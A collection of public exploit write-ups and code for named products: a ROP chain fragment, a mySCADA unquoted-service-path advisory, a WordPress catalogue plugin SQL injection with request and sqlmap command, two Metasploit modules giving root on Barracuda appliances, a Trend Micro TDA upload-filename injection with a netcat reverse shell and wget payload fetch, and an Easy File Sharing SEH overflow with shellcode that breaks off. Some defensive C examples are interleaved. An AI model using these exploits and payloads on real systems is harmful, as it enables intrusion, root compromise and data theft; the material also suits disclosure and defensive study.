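        (0x90909090, "NOP filler for EAX"),
        (0x1001d7a5, "PUSHAD # RETN [BASS.dll]"),
    ])


if __name__ == "__main__":
    chain = vuplayer_chain()
    print(len(chain), "bytes, bad offsets:", bad_offsets(chain))
```

Running bad_offsets() on p32(0x201) and p32(0x40) shows why the chain cannot pack them directly, and build_chain() turns a silent corruption into an error at build time, which is where you want to learn that a gadget's address contains 0x20 or 0x40.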
mySCADAProv7 Local Privilege Escalation
Vendor: mySCADA Technologies s.r.o.
Product web page: https://www.myscada.org/
Affected application: myscadaPro
Affected version: v7 (Current version)
Vulnerability discovered by: Karn Ganeshen
Description:
The myscadaPro7 application installs eight (8) services. All of them run as LocalSystem by default and suffer from an unquoted search path issue. This could allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges of the application.
Tested on:
Microsoft Windows Vista Ultimate SP2 (EN)
Details
The following services have insecurely quoted paths:
1. Bonjour Service (Bonjour Service) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mDNSResponder.exe:
2. myalerting (myalerting) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myalerting.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" -m \"C:\ProgramData\mySCADA\msmtp.conf\" -s \"C:\ProgramData\mySCADA\sms.conf\" ":
3. myscadacom (myscadacom) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadacom.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ":
4. myscadadb (myscadadb) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadadb.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ":
5. myscadagate (myscadagate) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadagate.exe\" -f \"C:\ProgramData\mySCADA\myscada.conf\" ":
6. myscadahmi (myscadahmi) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadahmi.exe\" -p \"C:\Program Files\mySCADA\" -c \"conf\hmi.conf\" ":
7. myscadalog (myscadalog) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\myscadalog.exe\" -c \"C:\ProgramData\mySCADA\myscada.conf\" ":
8. myscadascr (myscadascr) runs as LocalSystem and has path: C:\Program Files\mySCADA\bin\mySCADAservice.exe "\"C:\Program Files\mySCADA\bin\node.exe\" \"C:\Program Files\mySCADA\bin\scripts\scripts.js\" -c \"C:\ProgramData\mySCADA\myscada.conf\" -a 1 ":
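The check an administrator would run over the ImagePath strings above, as an added example that is not part of the advisory: for an unquoted path, the service control manager tries each space-delimited prefix (with ".exe" appended) before the real binary, so the audit lists those prefixes so they can be checked for existence and for non-administrator write permission. The parsing rule implemented here (first ".exe" component, every space before it) is the usual approximation of CreateProcess behaviour, not a Windows API; the sample paths are taken from the list above.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

#define MAX_CANDIDATES 16
#define MAX_PATH_LEN   512

/* Case-insensitive search for the first ".exe" in s; returns the index just
 * past it, or -1 when there is none. */
static int find_exe_end(const char *s)
{
    size_t n = strlen(s);
    for (size_t i = 0; i + 4 <= n; i++) {
        if (s[i] == '.' &&
            tolower((unsigned char)s[i + 1]) == 'e' &&
            tolower((unsigned char)s[i + 2]) == 'x' &&
            tolower((unsigned char)s[i + 3]) == 'e')
            return (int)(i + 4);
    }
    return -1;
}

/* Returns how many spurious executables would be probed before the intended
 * one, writing each to out[]. 0 means the path is not affected: it is
 * quoted, has no ".exe" component, or has no spaces before that component. */
int unquoted_path_candidates(const char *image_path,
                             char out[][MAX_PATH_LEN], int max_out)
{
    if (image_path == NULL || image_path[0] == '"')
        return 0;                        /* quoted: parsed unambiguously */
    int exe_end = find_exe_end(image_path);
    if (exe_end < 0)
        return 0;
    int count = 0;
    for (int i = 0; i < exe_end && count < max_out; i++) {
        if (image_path[i] != ' ')
            continue;
        /* The text before this space, with ".exe" appended, is tried first. */
        if (i + 5 > MAX_PATH_LEN)
            break;
        memcpy(out[count], image_path, (size_t)i);
        memcpy(out[count] + i, ".exe", 5);
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed from the service paths listed in the advisory; the last
     * entry is the same path in its quoted (fixed) form. */
    const char *paths[] = {
        "C:\\Program Files\\mySCADA\\bin\\mDNSResponder.exe",
        "C:\\Program Files\\mySCADA\\bin\\mySCADAservice.exe \"\\\"C:\\Program Files\\mySCADA\\bin\\myscadadb.exe\\\" -c \\\"C:\\ProgramData\\mySCADA\\myscada.conf\\\" \"",
        "\"C:\\Program Files\\mySCADA\\bin\\mDNSResponder.exe\"",
    };
    char cands[MAX_CANDIDATES][MAX_PATH_LEN];
    for (size_t p = 0; p < sizeof paths / sizeof paths[0]; p++) {
        int n = unquoted_path_candidates(paths[p], cands, MAX_CANDIDATES);
        printf("%s\n  -> %s\n", paths[p], n ? "UNQUOTED, probed first:" : "ok");
        for (int i = 0; i < n; i++)
            printf("     %s\n", cands[i]);
    }
    return 0;
}
```

Remediation is the quoted form shown last: wrap the executable path in double quotes in the service's ImagePath, and confirm that the directories named by the candidates are not writable by standard users.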
# Exploit Title: Wordpress Ultimate-Product-Catalog <= 3.9.8 (do_shortcode via ajax) Unsanitized shortcode attributes - Unauthenticated Blind SQL Injection
# Date: 2016-07-28
# Google Dork: "Index of /wp-content/plugins/ultimate-product-catalogue/"
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.EtoileWebDesign.com/ultimate-product-catalogue/
# Software Link:
# Version: <=3.9.8
# Tested on: Windows 7 + Firefox.
====================
DESCRIPTION
====================
A vulnerability has been discovered in the WordPress Ultimate Product Catalog plugin, affecting v3.9.8 and below (tested).
It is due to unsanitized parameters passed to the shortcode function `Insert_Product_Catalog` [ "product-catalogue" ],
located in `/Functions/Shortcodes.php` line 4:
function Insert_Product_Catalog($atts) {
// Select the catalogue information from the database
...
$Catalogue = $wpdb->get_row("SELECT * FROM $catalogues_table_name WHERE Catalogue_ID=" . $id);
$CatalogueItems = $wpdb->get_results("SELECT * FROM $catalogue_items_table_name WHERE Catalogue_ID=" . $id . " ORDER BY Position");
...
return $ProductString;
}
The $id parameter is extracted from $atts with the `extract` function. On its own this can only be exploited by creating shortcodes with
malicious attributes, i.e. by administrators, editors and authors. But in file `/Functions/Process_Ajax.php` line 113...
function UPCP_Filter_Catalogue() {
$Path = ABSPATH . 'wp-load.php';
include_once($Path);
$id = $_POST['id']; <-- we can control this value!!
...
echo do_shortcode("[product-catalogue id='" . $id . "' only_inner='Yes' starting_layout='" . $start_layout . "' excluded_layouts='" . $exclude_layouts . "' current_page='" . $current_page . "' ajax_reload='" . $ajax_reload . "' ajax_url='" . $ajax_url . "' request_count='" . $request_count . "' category='" . $Category . "' subcategory='" . $SubCategory . "' tags='" . $Tags . "' custom_fields='" . $Custom_Fields . "' prod_name='" . $Prod_Name . "' min_price='" . $Min_Price . "' max_price='" . $Max_Price . "']");
}
This is interesting because that function calls `do_shortcode`, which executes the 'product-catalogue' shortcode and therefore calls `Insert_Product_Catalog`, where
I found the SQLi. Now we need to find a place where `UPCP_Filter_Catalogue` is called, and on lines 138-139 I found...
...
add_action('wp_ajax_update_catalogue', 'UPCP_Filter_Catalogue');
add_action( 'wp_ajax_nopriv_update_catalogue', 'UPCP_Filter_Catalogue');
...
this means that we can execute that function with nothing more than a request to `/wp-admin/admin-ajax.php?action=update_catalogue`, sending the vulnerable $id parameter
with our custom payload. Note that the `wp_ajax_nopriv` prefix makes this vulnerability exploitable by unauthenticated users.
Example:
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue
POSTDATA: id=0+or+(our+custom+select+here)+--
An attacker can exploit this vulnerability and compromise all user records or take over control of the host machine.
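The root cause above is that `id` reaches the query as a string, while the only thing the shortcode needs from it is an integer. The following is an added example, not plugin code, of the validation that an integer placeholder in a prepared statement (the vendor's 3.9.9 fix) effectively enforces, written in C so it can be checked stand-alone; `catalogues_table` is a placeholder for the plugin's `$catalogues_table_name`. It also shows why a lenient cast is not a substitute: `strtol`/`atoi` turn the advisory's `1 OR SLEEP(10)-- ` into a perfectly valid `1`, so the probe is neither blocked nor logged.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

/* Strict parse of a catalogue id: ASCII digits only, nothing else. Returns 1
 * and stores the value on success, 0 on any deviation (sign, whitespace,
 * trailing bytes, overflow). */
int parse_catalogue_id(const char *raw, unsigned long *out)
{
    if (raw == NULL || *raw == '\0')
        return 0;
    for (const char *p = raw; *p; p++)
        if (*p < '0' || *p > '9')
            return 0;               /* strtoul alone would accept " 1" or "+1" */
    char *end = NULL;
    errno = 0;
    unsigned long v = strtoul(raw, &end, 10);
    if (errno == ERANGE || end == raw || *end != '\0')
        return 0;
    *out = v;
    return 1;
}

/* The lenient alternative, for contrast: what atoi() or a bare integer cast
 * yields. An injection attempt becomes a valid-looking id and vanishes. */
long lenient_id(const char *raw)
{
    return strtol(raw, NULL, 10);
}

/* Builds the catalogue lookup only from a validated integer. Returns 1 and
 * writes the query on success; returns 0, writes nothing and logs the
 * rejected value otherwise, so probes show up in the error log. */
int build_catalogue_query(const char *raw, char *buf, size_t buflen)
{
    unsigned long id;
    if (!parse_catalogue_id(raw, &id)) {
        fprintf(stderr, "rejected catalogue id: %.60s\n", raw ? raw : "(null)");
        return 0;
    }
    int n = snprintf(buf, buflen,
                     "SELECT * FROM catalogues_table WHERE Catalogue_ID=%lu", id);
    return n > 0 && (size_t)n < buflen;
}

int main(void)
{
    /* Constructed inputs: a normal id, then the advisory's probes. */
    const char *inputs[] = { "7", "1 OR SLEEP(10)-- ", "0 or (select 1)-- " };
    char query[128];
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        if (build_catalogue_query(inputs[i], query, sizeof query))
            printf("ok:  %s\n", query);
        else
            printf("     (a lenient parse would have silently used id=%ld)\n",
                   lenient_id(inputs[i]));
    }
    return 0;
}
```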
==============
POC
==============
-----------------
//REQUEST
------------------
POST /wordpress/wp-admin/admin-ajax.php?action=update_catalogue HTTP/1.1
Host: localhost
Content-Length: 21
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.8
Cookie:
id=1+OR+SLEEP(10)+--+
--------------------------
EXPLOITING WITH SQLMAP
------------------------
sqlmap --url="http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=update_catalogue" --data="id=1" --level=5 --risk=3 --technique=B -p id --dbs --dbms=mysql
(listing all available databases)
==================================
time-line
===================================
2016-07-28: reported to vendor.
2016-07-28: vendor released plugin version 3.9.9, saying in the changelog "Minor ajax update to switch to a prepared statement".
2016-07-29: public disclosure.
===================================
# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)
# Date: 07/28/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.008 (2016-03-22)
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.008 (2016-03-22)
# CVE : None.
# vuln: UPDATE_va_other_options trigger exploit
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (3)',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Barracuda Web App Firewall
Firmware Version <= 8.0.1.008 and Load Balancer Firmware <= v5.4.0.004 by exploiting a vulnerability
in the web administration interface. By sending a specially crafted request it's possible to inject
system commands while escalating to root due to relaxed sudo configurations on the appliances.
},
'Author' =>
[
'xort', # vuln + metasploit module
],
'Version' => '$Revision: 2 $',
'References' =>
[
[ 'none', 'none'],
],
'Platform' => [ 'linux'],
'Privileged' => true,
'Arch' => [ ARCH_X86 ],
'SessionTypes' => [ 'shell' ],
'Privileged' => false,
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => 'find',
}
},
'Targets' =>
[
['Barracuda Web App Firewall Firmware Version <= 8.0.1.008 (2016-03-22)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
}
],
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
}
],
],
'DefaultTarget' => 0))
register_options(
[
OptString.new('PASSWORD', [ false, 'Device password', "" ]),
OptString.new('ET', [ false, 'Device password', "" ]),
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
vprint_status( "Running Command...\n" )
# file to replace
sudo_cmd_exec = target['SudoCmdExec']
#sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
#sudo_cmd_exec = "/home/product/code/firmware/current/bin/rdpd"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
vprint_status(" file = " + b64dumpfile)
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile # + " ; rm " + b64dumpfile
exploitreq = [
[ "auth_type","Local" ],
[ "et",et ],
[ "locale","en_US" ],
[ "password", password ],
[ "primary_tab", "ADVANCE" ],
[ "realm","" ],
[ "secondary_tab","advanced_system" ],
[ "user", username ],
[ "timestamp", Time.now.to_i ],
[ "UPDATE_va_other_options", "1" ],
[ "UPDATE_scan_information_in_use", "xx; #{injection_string}" ] # vuln
]
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
post_data = ""
exploitreq.each do |xreq|
post_data << "--#{boundary}\r\n"
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
post_data << "#{xreq[1]}\r\n"
end
post_data << "--#{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data,
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
}
})
end
def run_script(username, password, et, cmds)
vprint_status( "running script...\n")
end
def exploit
# timeout
timeout = 1550;
user = "admin"
# params
real_user = "";
login_state = "out"
et = Time.now.to_i
locale = "en_US"
user = "admin"
password = "admin"
enctype = "MD5"
password_entry = ""
password_clear = "admin"
if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?
password_clear = datastore['PASSWORD']
password = datastore['PASSWORD']
# et = datastore['ET']
end
password_hash, et = do_login(user, password_clear, et)
vprint_status("new password: #{password_hash} et: #{et}\n")
sleep(5)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
run_command(user, password_hash, et, ("printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
# Exploit Title: Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Remote Root Exploit
# Date: 07/28/16
# Exploit Author: xort xort@blacksecurity.org
# Vendor Homepage: https://www.barracuda.com/
# Software Link: https://www.barracuda.com/products/webapplicationfirewall
# Version: Web App Firewall Firmware <= 8.0.1.008 (2016-03-22)
# Tested on: Web App Firewall Firmware <= v8.0.1.008 (2016-03-22)
# CVE : None.
# vuln: interface_stats
require 'msf/core'
require 'date'
require "base64"
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Barracuda Web Application Firewall <= v8.0.1.008 Post Auth Root Exploit',
'Description' => %q{
This module exploits a remote command execution vulnerability in the Barracuda Web
Application Firewall firmware versions <= v8.0.1.008 (2016-03-22) by exploiting a
vulnerability in the web administration interface. By sending a specially crafted
request it's possible to inject system commands while escalating to root due to relaxed
sudo configuration on the local machine.
},
'Author' => [ 'xort' ], # disclosure and exploit module
'References' => [ [ 'none', 'none'] ],
'Platform' => [ 'linux'],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'Targets' => [['Web Application Firewall <= v8.0.1.008 (2016-03-22)', {}]],
'DefaultTarget' => 0 ))
register_options(
[
OptString.new('PASSWORD', [ false, 'Password', "admin" ]),
OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]),
OptString.new('CMD', [ false, 'Command to execute', "" ]),
Opt::RPORT(8000),
], self.class)
end
def do_login(username, password_clear, et)
vprint_status( "Logging into machine with credentials...\n" )
# vars
timeout = 1550;
enc_key = Rex::Text.rand_text_hex(32)
# send request
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'Accept' => "application/json, text/javascript, */*; q=0.01",
'Content-Type' => "application/x-www-form-urlencoded",
'X-Requested-With' => "XMLHttpRequest"
},
'vars_post' =>
{
'enc_key' => enc_key,
'et' => et,
'user' => "admin", # username,
'password' => "admin", # password_clear,
'enctype' => "none",
'password_entry' => "",
'login_page' => "1",
'login_state' => "out",
'real_user' => "",
'locale' => "en_US",
'form' => "f",
'Submit' => "Sign in",
}
}, timeout)
# get rid of first yank
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
return password, et
end
def run_command(username, password, et, cmd)
# file to replace
sudo_cmd_exec = "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
vprint_status( "Running Command...\n" )
# random filename to dump too + 'tmp' HAS to be here.
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
# decoder stubs - tells 'base64' command to decode and dump data to temp file
b64decode1 = "echo \""
b64decode2 = "\" | base64 -d >" + b64dumpfile
# base64 - encode with base64 so we can send special chars and multiple lines
cmd = Base64.strict_encode64(cmd)
# Create injection string.
# a) package the base64 decoder with encoded bytes
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
# c) execute decoded base64 dumpfile
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
# injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile
vprint_status( "sending..." )
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cgi-mod/index.cgi",
'headers' =>
{
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
},
'vars_get' => {
'ajax_action' => 'interface_stats',
'user' => username,
'password' => password,
'et' => et,
'locale' => 'en_US',
'realm' => '',
'auth_type' => 'Local',
'primary_tab' => 'BASIC',
'secondary_type' => 'status',
'interface' => 'eth0' + '| ' + injection_string + ' |echo ' # vuln
}
})
end
def exploit
# params
timeout = 1550;
real_user = "";
et = Time.now.to_i
user = datastore['USERNAME']
password = datastore['PASSWORD']
# do login and get password hash
password_hash, et = do_login(user, password, et)
vprint_status("got password hash: #{password_hash}\n")
sleep(2)
#if no 'CMD' string - add code for root shell
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
cmd = datastore['CMD']
# Encode cmd payload
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
else
# Encode payload to ELF file for deployment
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
# kill stale calls to bdump from previous exploit calls for re-use
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
handler
end
end
end
Version: TDA 2.6.1062r1
Summary:
The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.
Details:
The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used:
POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=---------------------------7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=
-----------------------------7e0823930136
Content-Disposition: form-data; name="ajaxuploader_file"; filename="test.txt"
Content-Type: text/plain
a
-----------------------------7e0823930136--
The actual injection takes place in the name of the file being uploaded (i.e. filename="test.txt&id"). By performing the following request, system information is sent back in the response:
http://www.korpritzombie.com/wp-content/uploads/2016/07/1.png
This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) commands are possible.
Special characters like '/', '<', '>' are not sent across to the server. But by utilizing the environment itself, it becomes possible to insert characters like the '/'. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print '/' into the final command):
http://www.korpritzombie.com/wp-content/uploads/2016/07/2.png
Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f
To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:
test.txt&wget http:`echo $PATH | cut -c1``echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell
Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:
test.xml&chmod a+x shell
test.xml&.`echo $PATH | cut -c1`shell
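The flaw above is a filename taken from the multipart part and handed to a shell. As an added example (not Trend Micro code), the following parses the `filename="..."` value out of a part like the request quoted earlier and applies an allowlist before the name can reach anything that executes: a name such as `test.txt&id` is rejected outright, and the rejection is what should be logged. The body builder and the sample names are constructed; the boundary and field name follow the request above.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define NAME_MAX_LEN 255
#define BOUNDARY "---------------------------7e0823930136"

/* Copies the filename="..." value from the first Content-Disposition header
 * in body into out. Returns 1 on success, 0 when absent, empty or too long. */
int multipart_filename(const char *body, char *out, size_t outlen)
{
    const char *cd = strstr(body, "Content-Disposition:");
    if (cd == NULL)
        return 0;
    const char *eol = strstr(cd, "\r\n");            /* header ends at CRLF */
    const char *fn = strstr(cd, "filename=\"");
    if (fn == NULL || (eol != NULL && fn > eol))
        return 0;                                    /* filename belongs to a later part */
    fn += strlen("filename=\"");
    const char *q = strchr(fn, '"');
    if (q == NULL || (eol != NULL && q > eol))
        return 0;
    size_t len = (size_t)(q - fn);
    if (len == 0 || len >= outlen)
        return 0;
    memcpy(out, fn, len);
    out[len] = '\0';
    return 1;
}

/* Allowlist: letters, digits, '.', '_' and '-' only, and no leading dot.
 * That excludes path separators, '&', backticks, '$' and everything else a
 * shell or a path join would interpret. */
int filename_is_safe(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > NAME_MAX_LEN || name[0] == '.')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* 1 if the part's filename was extracted and passes the allowlist. The
 * extracted name stays in out either way so a rejection can be logged. */
int upload_part_ok(const char *body, char *out, size_t outlen)
{
    if (!multipart_filename(body, out, outlen))
        return 0;
    return filename_is_safe(out);
}

/* Builds a one-part body shaped like the request in the advisory (constructed). */
void make_body(char *buf, size_t n, const char *filename)
{
    snprintf(buf, n,
             "--" BOUNDARY "\r\n"
             "Content-Disposition: form-data; name=\"ajaxuploader_file\"; filename=\"%s\"\r\n"
             "Content-Type: text/plain\r\n\r\n"
             "a\r\n"
             "--" BOUNDARY "--\r\n", filename);
}

int main(void)
{
    const char *names[] = { "test.txt", "test.txt&id", "../../tmp/x",
                            "test.txt&wget http:`echo $PATH | cut -c1`x" };
    char body[1024], name[NAME_MAX_LEN + 1];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        make_body(body, sizeof body, names[i]);
        printf("%-45s -> %s\n", names[i],
               upload_part_ok(body, name, sizeof name) ? "accepted" : "REJECTED");
    }
    return 0;
}
```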
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 SEH Overflow with Egghunter
# Date: July 29, 2016
# Exploit Author: ch3rn0byl
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/download.php
# Version: 7.2
# Tested on: Windows 7, 8, 8.1, 10
# Admin privileges anyone?? hehe ;)
from socket import socket, AF_INET, SOCK_STREAM
from sys import argv
from struct import pack
from time import sleep
from subprocess import call
host = argv[1]
rekt = ""
rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90"
rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb"
rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12"
rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc"
rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29"
rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34"
rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6"
rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82"
rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae"
